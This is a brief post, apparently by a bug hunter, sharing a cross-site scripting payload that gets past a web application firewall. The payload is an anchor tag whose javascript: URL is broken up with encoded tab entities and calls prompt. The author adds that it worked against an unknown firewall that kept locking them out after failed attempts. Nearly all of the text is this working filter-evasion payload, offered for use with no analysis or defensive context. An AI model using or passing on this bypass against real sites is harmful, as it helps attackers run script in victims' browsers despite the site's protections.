WAF bypass:
<a href=ja%26Tab%3bvasc%26Tab%3bript:prompt`1`>pwn</a>
WAF is unknown, but payload can be useful.
Not sure what it was, but nothing else worked and it kept blocking me for 2 hours after 5 failures.